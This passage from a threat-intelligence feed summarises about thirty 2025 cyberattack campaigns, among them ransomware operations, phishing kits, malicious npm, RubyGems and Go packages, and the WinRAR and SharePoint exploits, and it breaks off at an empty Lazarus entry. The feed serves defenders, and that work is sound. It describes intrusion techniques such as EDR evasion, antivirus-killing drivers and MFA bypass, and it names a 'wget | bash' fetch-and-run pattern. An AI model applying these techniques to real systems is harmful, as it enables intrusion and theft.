Researchers at Hunt.io have uncovered a phishing campaign conducted by APT Sidewinder, targeting government and military entities across South Asia, including Bangladesh, Nepal, Turkey, and Pakistan. The group’s primary objective is to harvest credentials via spear-phishing links that impersonate official Zimbra webmail and secure portal interfaces. The attackers host counterfeit login pages on free platforms like Netlify and Pages.dev, then exfiltrate the stolen credentials through HTTP POST requests to their own servers. Victims include defense procurement agencies, military email portals, and national webmail systems, exposing high-value accounts to unauthorized access.
Source: https://hunt.io/blog/apt-sidewinder-netlify-government-phishing
2025-08-16
Crypto24_stealth_ransomware_operations
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Crypto24_stealth_ransomware_operations
Date of Scan:
2025-08-16
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have observed Crypto24 running coordinated, multi-stage ransomware intrusions that blend legitimate administration tools with custom malware to gain and persist elevated access while evading EDR, then exfiltrate data and encrypt systems. The group targets large enterprises across Asia, Europe, and the United States in financial services, manufacturing, entertainment, and technology. Operations center on Windows enterprise estates: operators create or reactivate privileged accounts, move laterally via PsExec and RDP/AnyDesk, patch termsrv.dll to enable concurrent sessions, and maintain surveillance with a keylogger while using Google Drive for stealthy exfiltration.
Source: https://www.trendmicro.com/en_no/research/25/h/crypto24-ransomware-stealth-attacks.html
2025-08-16
CrossC2_Campaign_Targets_AD_via_Dual_OS_Loader
MEDIUM
Intel Source:
JPCERT
Intel Name:
CrossC2_Campaign_Targets_AD_via_Dual_OS_Loader
Date of Scan:
2025-08-16
Impact:
MEDIUM
Summary:
Researchers at JPCERT have observed a campaign running from September to December 2024, involving the deployment of CrossC2—an unofficial, cross-platform Cobalt Strike Beacon builder—alongside a custom Nim-based loader known as ReadNimeLoader to stage Cobalt Strike on both Linux/macOS and Windows systems. The threat actor appears focused on achieving lateral movement and maintaining persistent access within Active Directory environments, utilizing tools such as PsExec, Plink (SSH), and SystemBC for remote access and data exfiltration. Key techniques include DLL sideloading of ReadNimeLoader via java.exe through scheduled tasks, multi-stage in-memory shellcode loading using OdinLdr, and various anti-analysis measures like XOR string encoding, junk-code insertion, and debug/time-based checks. The campaign primarily targeted Linux servers without EDR in conjunction with Windows AD infrastructure, with signs of compromise reported across multiple countries.
Source: https://blogs.jpcert.or.jp/en/2025/08/crossc2.html
2025-08-16
EncryptHub_MMC_Social_Engineering_Exploitation
MEDIUM
Intel Source:
Trustwave
Intel Name:
EncryptHub_MMC_Social_Engineering_Exploitation
Date of Scan:
2025-08-16
Impact:
MEDIUM
Summary:
Researchers at Trustwave have identified an EncryptHub intrusion campaign combining live social-engineering with exploitation of Microsoft Management Console (MMC) “EvilTwin” (CVE-2025-26633) to gain execution and persistent control of victim systems. Threat actors impersonate IT support during unsolicited calls, guide targets into a remote session, and deploy a staged PowerShell loader that replaces a benign MMC snap-in with a malicious counterpart in the MUIPath directory. When launched, mmc.exe loads the twin and initiates encrypted command-and-control communications. The payload chain includes data theft modules targeting files, system credentials, and cryptocurrency wallets, as well as a Golang-based loader (“SilentCrystal”) that retrieves stage archives from Brave Support to blend into legitimate traffic.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/when-hackers-call-social-engineering-abusing-brave-support-and-encrypthubs-expanding-arsenal/
2025-08-16
Proofpoint_and_Intermedia_Link_Wrapping_Abuse
MEDIUM
Intel Source:
Cloudflare
Intel Name:
Proofpoint_and_Intermedia_Link_Wrapping_Abuse
Date of Scan:
2025-08-16
Impact:
MEDIUM
Summary:
Cloudflare researchers have uncovered a phishing campaign in which threat actors exploit legitimate link wrapping services from Proofpoint and Intermedia to conceal malicious URLs. These obfuscated links redirect victims to deceptive Microsoft Office 365 credential harvesting pages. The attackers use social engineering lures such as fake voicemail alerts, shared Teams or Word documents, and Zix Secure Message prompts, which lead to phishing sites that impersonate Microsoft and Constant Contact login portals. The primary objective of the campaign is credential theft, likely for financial fraud and identity misuse.
Source: https://www.cloudflare.com/threat-intelligence/research/report/attackers-abusing-proofpoint-intermedia-link-wrapping-to-deliver-phishing-payloads/
2025-08-16
GreedyBear_Campaign
LOW
Intel Source:
Koi Security (Medium)
Intel Name:
GreedyBear_Campaign
Date of Scan:
2025-08-16
Impact:
LOW
Summary:
Researchers at Koi Security identified a financially motivated cybercriminal group called GreedyBear, targeting cryptocurrency users through weaponized Firefox extensions, malicious Windows executables and fake websites. The group’s primary objective is to harvest wallet credentials and exfiltrate funds through a centralized C2 server. GreedyBear leverages a technique called Extension Hollowing, in which it initially deploys non-malicious extensions with fake positive reviews, then converts them into malicious ones to steal wallet credentials. The group distributes credential stealers, ransomware variants and generic trojans through cracked software sites. Victims include crypto users, individuals who download pirated software, and those visiting fake wallet repair pages.
Source: https://blog.koi.security/greedy-bear-massive-crypto-wallet-attack-spans-across-multiple-vectors-3e8628831a05
2025-08-16
Deployment_of_Multi_Ransomware_via_SharePoint_Exploitation
HIGH
Intel Source:
Check Point
Intel Name:
Deployment_of_Multi_Ransomware_via_SharePoint_Exploitation
Date of Scan:
2025-08-16
Impact:
HIGH
Summary:
Check Point researchers have identified Storm-2603, a previously undocumented, China-affiliated threat actor linked to the exploitation of Microsoft SharePoint Server vulnerabilities. Active between March and July 2025, the group targeted organizations across Latin America and the Asia-Pacific region, deploying multiple ransomware families including LockBit Black and Warlock/X2anylock via MSI installers that exploit DLL hijacking techniques. Storm-2603 employs a custom AK47 C2 framework with both DNS and HTTP backdoors, and leverages open-source tools such as PsExec and masscan alongside a custom BYOVD-based antivirus terminator to evade detection. This sophisticated toolset enables stealthy operations, robust persistence, and high-impact data encryption across enterprise environments.
Source: https://research.checkpoint.com/2025/before-toolshell-exploring-storm-2603s-previous-ransomware-operations/
2025-08-15
Blind_Eagle_Deploys_DcRAT_via_SVG_Phishing
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
Blind_Eagle_Deploys_DcRAT_via_SVG_Phishing
Date of Scan:
2025-08-15
Impact:
MEDIUM
Summary:
Researchers at the 360 Threat Intelligence Center reported that APT-C-36 (Blind Eagle) conducted spearphishing attacks in May 2025, aiming to deploy the open-source DcRAT remote access tool. The group leverages malicious SVG files containing download links hosted on Bitbucket, tricking victims into executing a legitimate GitKraken component that side-loads a custom, obfuscated DLL. This payload incorporates techniques such as virtual machine detection, control-flow flattening, and anti-analysis checks before injecting DcRAT into msbuild.exe or InstallUtil.exe via process hollowing. Persistence is achieved through registry Run keys. The campaign primarily targets government entities, financial and insurance sectors, and large enterprises across Colombia, Ecuador, Chile, and Panama.
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507237&idx=1&sn=8302408c71adb39f8998bf693ccd39f2&poc_token=HFCJnWij7sJxRegOijAlSRGFgUmrmPgtuSamiWw0
2025-08-15
VexTrio_Global_Scam_Distribution_Network
MEDIUM
Intel Source:
infoblox
Intel Name:
VexTrio_Global_Scam_Distribution_Network
Date of Scan:
2025-08-15
Impact:
MEDIUM
Summary:
Researchers at Infoblox Threat Intel have identified a persistent cybercriminal operation, VexTrio, that orchestrates a large-scale traffic distribution and affiliate scam network spanning multiple fraud verticals, including dating, cryptocurrency, sweepstakes, fake antivirus, and deceptive push notifications. The group uses cloaked smartlinks embedded in compromised websites and social platforms, funneling victims through spoofed brand pages and scripted “click to allow” prompts, while expanding into mobile app–based monetization via VPNs, “spam blockers,” and dating applications published under frequently rotated developer accounts.
Source: https://blogs.infoblox.com/threat-intelligence/vextrio-unmasked-a-legacy-of-spam-and-homegrown-scams/
2025-08-15
ShinyHunters_Spider_Salesforce_Intrusion
MEDIUM
Intel Source:
ReliaQuest
Intel Name:
ShinyHunters_Spider_Salesforce_Intrusion
Date of Scan:
2025-08-15
Impact:
MEDIUM
Summary:
Researchers at ReliaQuest have identified coordinated Salesforce-targeted intrusions conducted by ShinyHunters that exhibit strong tactical overlap with Scattered Spider operations, suggesting collaboration or shared resources. The campaign combines phishing and vishing to impersonate corporate IT staff, lure victims to Okta-branded SSO portals, and convince them to authorize malicious Salesforce connected apps, enabling large-scale CRM data exfiltration. VPN infrastructure is used during the extraction to obscure origin. Analysis of domain registrations and underground forum activity indicates the nexus began mid-2024, with a sharp rise in infrastructure creation in late June 2025 and live phishing domains active as of August 1, 2025.
Source: https://reliaquest.com/blog/threat-spotlight-shinyhunters-data-breach-targets-salesforce-amid-scattered-spider-collaboration/
2025-08-15
Web3_Interview_Scam
LOW
Intel Source:
SlowMist
Intel Name:
Web3_Interview_Scam
Date of Scan:
2025-08-15
Impact:
LOW
Summary:
Researchers from SlowMist have uncovered a Web3 scam campaign in which attackers leverage a malicious NPM package called rtk-logger@1.11.5, delivered under the guise of a fake job interview targeting developers. The attackers lure candidates into cloning a repository, masquerading as a Ukrainian team, that secretly contains the package. Once installed, it exfiltrates sensitive data such as browser extension information, cryptocurrency wallet files, seed phrases, session tokens, and login credentials for potential espionage and financial theft. The malware employs heavily obfuscated JavaScript, AES-256-CBC–encrypted payloads decoded at runtime, and Node.js modules to harvest data from Chrome, Brave, Opera, Firefox, Exodus wallets, and macOS Keychain. The stolen data is sent to attacker-controlled servers, while a secondary Python script enables remote access and command execution. This supply chain compromise exploits malicious dependencies to establish initial access, persistence, and C2 capabilities.
Source: https://slowmist.medium.com/threat-intelligence-uncovering-a-web3-interview-scam-bb366694b7f3
2025-08-15
RubyGems_Infostealer
LOW
Intel Source:
Socket
Intel Name:
RubyGems_Infostealer
Date of Scan:
2025-08-15
Impact:
LOW
Summary:
Researchers from Socket have uncovered a long-running supply chain attack targeting the RubyGems ecosystem, attributed to a threat actor operating under aliases such as zon, nowon, kwonsoonje, and soonje. Since at least March 2023, the attacker has published over 60 malicious RubyGems packages disguised as automation tools for platforms like Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver. Although these tools provide legitimate bulk-posting and engagement functionality, they secretly steal user credentials and MAC addresses from compromised systems and exfiltrate the data to attacker-controlled servers via HTTP POST. The primary victims are grey-hat marketers who rely on social media accounts and automation tools. The use of Korean-language interfaces and region-specific infrastructure suggests a particular focus on South Korean users.
Source: https://socket.dev/blog/60-malicious-ruby-gems-used-in-targeted-credential-theft-campaign?utm_medium=feed
2025-08-14
PAM_Hooking_Backdoor_on_Linux
MEDIUM
Intel Source:
ASEC
Intel Name:
PAM_Hooking_Backdoor_on_Linux
Date of Scan:
2025-08-14
Impact:
MEDIUM
Summary:
Researchers at ASEC have observed threat actors abusing Linux Pluggable Authentication Modules (PAM) to steal credentials and maintain persistent access, using either malicious PAM modules or a PRELOAD-based hooking variant dubbed “Plague.” The malware intercepts authentication flows in services like sshd, captures credentials at login, and can accept a universal backdoor password while suppressing shell history and hiding artifacts to reduce evidence. Initial access remains unspecified, but persistence is achieved by loading a malicious library before legitimate PAM functions, enabling reliable credential capture and account takeover across users.
Source: https://asec.ahnlab.com/en/89557/
2025-08-14
Charon_Ransomware
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Charon_Ransomware
Date of Scan:
2025-08-14
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have identified a new ransomware called Charon targeting public sector and aviation organizations in the Middle East. The attackers use advanced APT-style tactics similar to Earth Baxia campaigns, starting the attack by abusing DLL sideloading with a legitimate Edge browser file to load malicious code, which then injects the ransomware into svchost.exe to evade detection. Charon leverages process injection to bypass endpoint controls, disables security services, terminates protection software, and deletes shadow copies to impede recovery before encrypting both local and network shares using Curve25519/ChaCha20 encryption. It appends a [.]Charon extension to each file and embeds a custom infection marker, then drops a tailored ransom note, “How To Restore Your Files.txt”, across drives and network share locations.
Source: https://www.trendmicro.com/en_us/research/25/h/new-ransomware-charon.html
2025-08-14
SmartLoader_GitHub_Infostealer_Campaign
LOW
Intel Source:
ASEC
Intel Name:
SmartLoader_GitHub_Infostealer_Campaign
Date of Scan:
2025-08-14
Impact:
LOW
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have identified a financially motivated operation that floods GitHub with repositories purporting to offer game cheats, software cracks, and automation tools. Visitors who download the supplied archive install an obfuscated Lua loader dubbed “SmartLoader,” which establishes persistence, harvests host information, and opens encrypted command-and-control to retrieve the Rhadamanthys infostealer. The stealer embeds itself in legitimate Windows processes and siphons credentials from email, FTP, and online-banking applications. First observed in August 2025, the campaign exploits search-engine optimisation to reach a global audience without resorting to phishing, enabling large-scale credential theft at minimal cost.
Source: https://asec.ahnlab.com/en/89551/
2025-08-13
ClickFix_PowerShell_RAT_Campaign
LOW
Intel Source:
Fortinet
Intel Name:
ClickFix_PowerShell_RAT_Campaign
Date of Scan:
2025-08-13
Impact:
LOW
Summary:
FortiGuard researchers have uncovered a phishing campaign targeting Israeli organisations that employs a PowerShell-only attack chain to deliver a RAT that enables persistent remote control, data exfiltration, surveillance, and lateral movement. The attack starts with spear-phishing emails that lead to a spoofed Microsoft Teams login page that tricks users into pasting obfuscated PowerShell commands into the Windows Run dialog. These commands execute a Click-to-Fix loader script, which uses Invoke-RestMethod over HTTPS to download additional scripts and run them directly in memory. Once deployed, the RAT gathers system details like the Windows domain, system name, and username, then continuously polls its hard-coded C2 servers for further instructions.
Source: https://www.fortinet.com/blog/threat-research/clickfix-to-command-a-full-powershell-attack-chain
2025-08-13
Odyssey_MacOS_Stealer
LOW
Intel Source:
ForcePoint
Intel Name:
Odyssey_MacOS_Stealer
Date of Scan:
2025-08-13
Impact:
LOW
Summary:
Researchers from Forcepoint uncovered the Odyssey Stealer campaign, which targets macOS users through a deceptive ClickFix CAPTCHA webpage. This lure delivers a Base64-encoded AppleScript payload that harvests browser extensions, cookies, keychains, and cryptocurrency wallet data before exfiltration. The campaign’s primary objective is financial gain through theft of credentials and crypto assets. Relying on social engineering and phishing, the attackers bypass traditional binary-based payloads to evade detection. Once executed, the malware compresses the collected data and exfiltrates it to an attacker-controlled C2 server. The campaign specifically targets individual macOS users with stored credentials and crypto wallets.
Source: https://www.forcepoint.com/blog/x-labs/odyssey-stealer-attacks-macos-users
2025-08-13
Exploitation_of_WinRAR_Vulnerability_by_RomCom
MEDIUM
Intel Source:
Socradar
Intel Name:
Exploitation_of_WinRAR_Vulnerability_by_RomCom
Date of Scan:
2025-08-13
Impact:
MEDIUM
Summary:
A newly discovered zero-day vulnerability (CVE-2025-8088) in the Windows version of WinRAR allows attackers to perform a critical path traversal, enabling them to hide malicious files in NTFS alternate data streams and force extraction into high-privilege locations. The vulnerability has been actively exploited by the Russia-aligned RomCom group (also known as Storm-0978, Tropical Scorpius, or UNC2596), which delivers it via targeted spear-phishing emails disguised as job applications with malicious RAR attachments. Once extracted, these payloads install shortcuts and DLLs in the %TEMP% and %LOCALAPPDATA% folders and the Windows Startup folder, ensuring persistence and automatic execution at system start. The campaign leverages three attack chains—Mythic Agent, SnipBot and RustyClaw/MeltingClaw downloaders—each supported by dedicated C2 infrastructure for modular and flexible operations.
Source: https://socradar.io/cve-2025-8088-winrar-zero-day-exploited-targeted/
2025-08-12
Kimsuky_Targeting_South_Korean_Critical_Entities
MEDIUM
Intel Source:
Aryaka
Intel Name:
Kimsuky_Targeting_South_Korean_Critical_Entities
Date of Scan:
2025-08-12
Impact:
MEDIUM
Summary:
Researchers from Aryaka have uncovered a stealthy cyber-espionage campaign attributed to the North Korean state-sponsored Kimsuky group, also tracked as APT43, Thallium and Velvet Chollima. The campaign targets South Korean government agencies, defense contractors, and research organizations. It begins with spear-phishing emails delivering malicious (.lnk) files that execute obfuscated HTA payloads via mshta.exe, bypassing static detection and performing anti-VM checks to evade sandbox environments. Upon execution, the HTA scripts decode and execute PowerShell-based stealer and keylogger components to harvest system information, recently accessed files, browser credentials and clipboard data. The stolen data is compressed into ZIP archives, segmented into multipart HTTP POST requests, and exfiltrated to C2 infrastructure. To maintain persistence, the malware modifies Windows registry Run keys and uses DLL injection to execute payloads directly in memory.
Source: https://www.aryaka.com/docs/reports/aryaka-kimsuky-apt-operational-blueprint.pdf
2025-08-12
Cmimai_Information_Stealer
LOW
Intel Source:
K7 Labs
Intel Name:
Cmimai_Information_Stealer
Date of Scan:
2025-08-12
Impact:
LOW
Summary:
K7 Labs researchers identified a VBS-based infostealer named Cmimai stealer that leverages Visual Basic scripting and PowerShell modules to harvest system metadata, browser information, and periodic screenshots from compromised Windows hosts. The malware operates silently in the background and maintains persistence by automatically re-running itself every hour. It stores activity logs in a temporary file and exfiltrates the stolen data to a Discord channel using HTTP POST to evade detection. The malware bypasses PowerShell execution restrictions and executes in invisible mode.
Source: https://labs.k7computing.com/index.php/silent-watcher-dissecting-cmimai-stealers-vbs-payload/
2025-08-12
Fake_Telegram_Site_Deploys_Lumma_Stealer_Variant
MEDIUM
Intel Source:
Cyfirma
Intel Name:
Fake_Telegram_Site_Deploys_Lumma_Stealer_Variant
Date of Scan:
2025-08-12
Impact:
MEDIUM
Summary:
CYFIRMA researchers have observed a malicious campaign that delivers a new Lumma Stealer variant via a spoofed Telegram Premium site. The operation began in mid-July 2025 and relies on a fake domain impersonating the legitimate Telegram Premium platform. Upon visiting the site, a Windows executable is automatically downloaded and executed without user interaction, enabling immediate system compromise. The malware is designed to exfiltrate browser-stored credentials, system metadata, and cryptocurrency wallet details. It employs techniques including dynamic code execution, registry manipulation, clipboard access, and DLL injection to maintain persistence and evade detection.
Source: https://www.cyfirma.com/research/fake-telegram-premium-site-distributes-new-lumma-stealer-variant/
2025-08-11
CastleLoader_Targeting_US_Government_Entities
MEDIUM
Intel Source:
Polyswarm
Intel Name:
CastleLoader_Targeting_US_Government_Entities
Date of Scan:
2025-08-11
Impact:
MEDIUM
Summary:
Researchers from Polyswarm have uncovered a new malware loader called CastleLoader, which targets U.S. government entities using phishing tactics and deceptive GitHub repositories. It is distributed through Cloudflare-themed ClickFix phishing pages and fake GitHub repositories disguised as legitimate tools like SQL Server Management Studio. Once executed, CastleLoader delivers payloads such as StealC, RedLine, DeerStealer, NetSupport RAT, SectopRAT, and HijackLoader. It leverages PowerShell and AutoIT scripts, injects shellcode into memory, and communicates with seven C2 servers through a web panel that enables payload control, privilege escalation, VM detection, and evasion through fake error messages.
Source: https://blog.polyswarm.io/castleloader
2025-08-11
A_Resurgence_of_Akira_and_Lynx_Ransomware_Groups
MEDIUM
Intel Source:
Acronis
Intel Name:
A_Resurgence_of_Akira_and_Lynx_Ransomware_Groups
Date of Scan:
2025-08-11
Impact:
MEDIUM
Summary:
Acronis researchers have observed a resurgence of two ransomware operators, Akira and Lynx, which have resumed high-volume operations in 2024–2025, leveraging double-extortion tactics to maximize financial gain. Their campaigns begin with phishing emails or the exploitation of known vulnerabilities in VPN and firewall appliances (Cisco CVE-2023-20269, SonicWall CVE-2024-40766) to gain initial access, followed by use of stolen or purchased administrative credentials for lateral movement. Operators conduct reconnaissance and privilege escalation, then employ PowerShell and Restart Manager to disable security software, delete shadow copies, and clear event logs. The ransomware encrypts files using ChaCha20 encryption and appends an RSA-encrypted key, while victims’ data is archived and exfiltrated, with public exposure threatened if ransom demands aren't met. Akira has targeted over 220 organizations, primarily law firms, construction companies, and accounting firms, while Lynx compromised at least 145 private-sector businesses, with a focus on managed service providers and small to mid-sized enterprises.
Source: https://www.acronis.com/en-us/tru/posts/msps-a-top-target-for-akira-and-lynx-ransomware/
2025-08-11
Tycoon_Phishing_Platform_Abuses_OAuth_to_Bypass_MFA
MEDIUM
Intel Source:
Proofpoint
Intel Name:
Tycoon_Phishing_Platform_Abuses_OAuth_to_Bypass_MFA
Date of Scan:
2025-08-11
Impact:
MEDIUM
Summary:
Proofpoint researchers have identified a phishing-as-a-service (PhaaS) platform known as Tycoon, which is actively conducting OAuth application impersonation campaigns to bypass MFA and facilitate account takeovers. These campaigns leverage spear phishing emails containing links to malicious OAuth consent pages that impersonate legitimate enterprise applications such as ILSMART and Adobe Sign. Once users grant permissions, the victim is redirected through a CAPTCHA to a fake Microsoft authentication page where credentials and the associated session cookie are harvested via the AiTM technique. This approach allows attackers to proxy the authentication flow and steal valid tokens in real time. The attackers primarily target organisations within the U.S. aerospace and defense sectors. Tycoon enables persistent, token-based access, effectively bypassing MFA and exposing organizations to data exfiltration, account abuse, and further post-compromise activities.
Source: https://www.proofpoint.com/us/blog/threat-insight/microsoft-oauth-app-impersonation-campaign-leads-mfa-phishing
2025-08-10
Malicious_Go_Packages_Distribute_Remote_Payloads
LOW
Intel Source:
Socket
Intel Name:
Malicious_Go_Packages_Distribute_Remote_Payloads
Date of Scan:
2025-08-10
Impact:
LOW
Summary:
Researchers have uncovered a software supply chain campaign involving eleven malicious Go packages designed to target developers and CI systems. These packages contain obfuscated loaders that quietly open command-line shells and download second-stage payloads from C2 servers hosted on .icu and .tech domains. The malware executes directly in memory using Unix (wget | bash) and Windows (certutil.exe) commands. The attackers use typosquatting to create malicious packages that trick developers into installing them. Once imported, the malware can run silently on Linux build servers or Windows workstations, allowing remote code execution, data theft, unauthorized access, and even ransomware deployment.
Source: https://socket.dev/blog/11-malicious-go-packages-distribute-obfuscated-remote-payloads?utm_medium=feed
2025-08-10
SocGholish_Malware_Campaign
MEDIUM
Intel Source:
Silentpush
Intel Name:
SocGholish_Malware_Campaign
Date of Scan:
2025-08-10
Impact:
MEDIUM
Summary:
Researchers at Silent Push have uncovered that the TA569 threat group is actively conducting a SocGholish campaign, which deceives users into installing malware through fake browser update prompts on legitimate but compromised websites. When users click on these fake Chrome or Firefox updates, a malicious JScript-based payload is downloaded onto their Windows systems. TA569 operates SocGholish as a MaaS platform, providing access to compromised systems to ransomware groups such as LockBit and Evil Corp, as well as other APT actors. The attackers use advanced techniques like domain shadowing and frequently changing C2 servers to evade detection. Additionally, they leverage Parrot TDS and Keitaro TDS to identify and target high-value victims based on their browser and activity. This campaign mainly targets users in North America and facilitates data theft, unauthorized remote access, and ransomware deployment.
Source: https://www.silentpush.com/blog/socgholish/?utm_source=rss&utm_medium=rss&utm_campaign=socgholish
2025-08-10
DarkCloud_Campaign
MEDIUM
Intel Source:
Fortinet
Intel Name:
DarkCloud_Campaign
Date of Scan:
2025-08-10
Impact:
MEDIUM
Summary:
Researchers at FortiGuard Labs have identified a new variant of the DarkCloud campaign that leverages a spearphishing email containing a malicious RAR file to execute obfuscated JavaScript and PowerShell scripts, which load a fileless .NET module from a code-embedded JPEG image hosted on archive.org. This module masquerades as a Windows Task Scheduler library, maintains persistence through the registry, and retrieves an additional payload from paste.ee to deploy a VB6-based DarkCloud stealer through process hollowing. It collects sensitive data such as system info, browser credentials, payment details, and email contacts, storing them locally before exfiltrating the information through encrypted emails to an attacker-controlled server.
Source: https://www.fortinet.com/blog/threat-research/unveiling-a-new-variant-of-the-darkcloud-campaign
2025-08-09
Ethereum_Drainer_Trading_Bot_Scam
LOW
Intel Source:
Sentinel Labs
Intel Name:
Ethereum_Drainer_Trading_Bot_Scam
Date of Scan:
2025-08-09
Impact:
LOW
Summary:
Researchers at SentinelOne Labs have uncovered a campaign in which threat actors employ obfuscated Solidity contracts disguised as Ethereum MEV trading bots to drain user wallets of significant funds. Since early 2024, actors have distributed weaponized contracts via aged YouTube channels, leveraging AI-generated videos and curated comment sections to fabricate legitimacy. Victims follow deployment instructions in Remix and fund the contract via Start() or StartNative(), triggering a failover mechanism that routes deposits to an attacker-controlled wallet.
Source: https://www.sentinelone.com/labs/smart-contract-scams-ethereum-drainers-pose-as-trading-bots-to-steal-crypto/
2025-08-09
GenAI_Powered_Brazil_Gov_Phishing
MEDIUM
Intel Source:
Zscaler
Intel Name:
GenAI_Powered_Brazil_Gov_Phishing
Date of Scan:
2025-08-09
Impact:
MEDIUM
Summary:
Researchers at Zscaler ThreatLabz have observed criminals using the low-cost generative AI tools DeepSite AI and BlackBox AI to clone Brazil’s State Department of Traffic and Ministry of Education portals and push the replicas to the top of search results through aggressive SEO poisoning. Citizens seeking licences or jobs are lured to the fake sites, enter CPF numbers and personal details that are validated in real time via attacker-controlled APIs, and are then instructed to pay a one-time R$87 “registration fee” via Pix, Brazil’s instant-payment system. The operation yields both direct revenue and a trove of verified identity data, enabling follow-on fraud and identity theft.
Source: https://www.zscaler.com/blogs/security-research/genai-used-phishing-websites-impersonating-brazil-s-government
2025-08-09
AK47_SharePoint_Exploit_Campaign
MEDIUM
Intel Source:
unit42
Intel Name:
AK47_SharePoint_Exploit_Campaign
Date of Scan:
2025-08-09
Impact:
MEDIUM
Summary:
Researchers at Palo Alto have observed a cluster tracked as CL-CRI-1040 exploiting newly disclosed SharePoint vulnerabilities since March 2025 via the ToolShell exploit chain, deploying both DNS- and HTTP-based backdoors alongside a custom ransomware strain dubbed AK47 (X2ANYLOCK). The actor leveraged CVE-2025-49704 and related flaws to breach on-premises SharePoint servers, executing commands, exfiltrating data via DNS TXT records and HTTP POST, then encrypting hosts for financial gain. Initial dnsclient and httpclient components surfaced in March and April 2025, rapidly evolving into a full ransomware loader by April 6, 2025. The blend of stealthy exfiltration, adaptive C2 protocols and destructive encryption highlights a sophisticated, financially motivated actor building on LockBit 3.0 and Warlock tactics.
Source: https://unit42.paloaltonetworks.com/ak47-activity-linked-to-sharepoint-vulnerabilities/
2025-08-09
AI_Generated_NPM_Malware_Target_Developers
LOW
Intel Source:
Safety
Intel Name:
AI_Generated_NPM_Malware_Target_Developers
Date of Scan:
2025-08-09
Impact:
LOW
Summary:
Safety researchers have discovered an AI-generated malicious NPM package called @kodane/patch-manager, a crypto wallet drainer targeting software developers. The package masquerades as a registry cache manager, but once installed, it secretly executes a hidden script that deploys background programs in concealed cache directories. It then connects to a remote server using WebSocket without requiring any authentication. Upon detecting a crypto wallet, a second script is activated, which swiftly transfers most of the funds to a Solana wallet. This malicious package impacts users across macOS, Linux, and Windows, putting both developers and their end-users at serious risk of financial loss.
Source: https://getsafety.com/blog-posts/threat-actor-uses-ai-to-create-a-better-crypto-wallet-drainer
2025-08-08
MedusaLocker_Ransomware_Deployment
MEDIUM
Intel Source:
Securelist
Intel Name:
MedusaLocker_Ransomware_Deployment
Date of Scan:
2025-08-08
Impact:
MEDIUM
Summary:
Kaspersky researchers have uncovered a ransomware campaign in which attackers leverage an AV killer tool to disable antivirus software on Windows systems. This tool, based on the Win64KILLAV malware, exploits a legitimate driver (ThrottleBlood.sys) to execute malicious code at the system level. The attackers gain access through compromised email or remote desktop accounts, followed by lateral movement using pass-the-hash techniques. Once the AV protections are disabled, the attackers deploy a MedusaLocker ransomware variant to encrypt critical files. The campaign primarily targets systems in Russia, Belarus, Kazakhstan, Ukraine, and Brazil. Additionally, the attackers bypass security layers, spread through the network, and cause significant data loss and operational disruption.
Source: https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/
2025-08-08
Bumblebee_and_AdaptixC2_Deliver_Akira_Ransomware
MEDIUM
+
Intel Source:
The DFIR Report
Intel Name:
Bumblebee_and_AdaptixC2_Deliver_Akira_Ransomware
Date of Scan:
2025-08-08
Impact:
MEDIUM
Summary:
According to researchers at The DFIR Report, a threat actor used SEO poisoning to lure users into downloading a fake ManageEngine OpManager installer that delivered the Bumblebee loader. Once inside the network, Bumblebee quickly deployed AdaptixC2 to conduct internal reconnaissance and steal credentials, leading to domain compromise. The actor created two user accounts, backup_DA and backup_EA, granted one of them high-level privileges, and used wbadmin.exe to dump sensitive data. Persistence was maintained by installing RustDesk and establishing an SSH reverse tunnel to an external server. The attackers exfiltrated critical data via SFTP and collected additional credentials by dumping LSASS memory. Two days later they returned and deployed Akira ransomware across both the root and child domains, encrypting files on local systems and shared drives and causing significant operational disruption.
Source: https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira/
2025-08-08
Exploitation_of_Rejetto_HTTP_File_Server_Vulnerability
MEDIUM
+
Intel Source:
Imperva
Intel Name:
Exploitation_of_Rejetto_HTTP_File_Server_Vulnerability
Date of Scan:
2025-08-08
Impact:
MEDIUM
Summary:
Researchers at Imperva uncovered a campaign in which an unidentified threat actor exploits CVE-2024-23692 in Rejetto HTTP File Server (HFS) 2.x to gain unauthenticated remote code execution and deploy multiple malware families, including the Farfli downloader, the Zenpak trojan, and jqvtd ransomware. The attackers run automated internet-wide scanning to find exposed HFS servers and deliver payloads via specially crafted requests that execute PowerShell and cmd.exe commands. The malware lets the attackers harvest data, maintain persistent access, and encrypt files for ransom. Compromised systems were observed communicating with C2 servers hosted in Hong Kong and with the domain sgke[.]cc. The campaign primarily targets organizations in the business, healthcare, and financial sectors.
Source: https://www.imperva.com/blog/imperva-detects-and-mitigates-rejetto-hfs-spray-and-pray-ransomware-trojan-campaign/
2025-08-07
APT36_MFA_OTP_Harvesting_Campaign
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
APT36_MFA_OTP_Harvesting_Campaign
Date of Scan:
2025-08-07
Impact:
MEDIUM
Summary:
Researchers at Cyfirma have observed Pakistan-linked APT36 orchestrating a sophisticated phishing operation targeting Indian government email systems by leveraging typo-squatted domains and harvesting time-based Kavach OTPs. Domains registered in June–July 2025 and hosted on Amazon and Cloudflare infrastructure were configured to relay credentials to Pakistani C2 servers, enabling real-time exfiltration. The operation’s advanced social engineering and coordinated domain deployments heighten the risk of unauthorized access to classified data and disruption of critical government infrastructure.
Source: https://www.cyfirma.com/research/apt36-a-phishing-campaign-targeting-indian-government-entities/
2025-08-07
Lazarus_Deploys_PyLangGhost_RAT_to_Steal_Data
MEDIUM
+
Intel Source:
ANY.RUN
Intel Name:
Lazarus_Deploys_PyLangGhost_RAT_to_Steal_Data
Date of Scan:
2025-08-07
Impact:
MEDIUM
Summary:
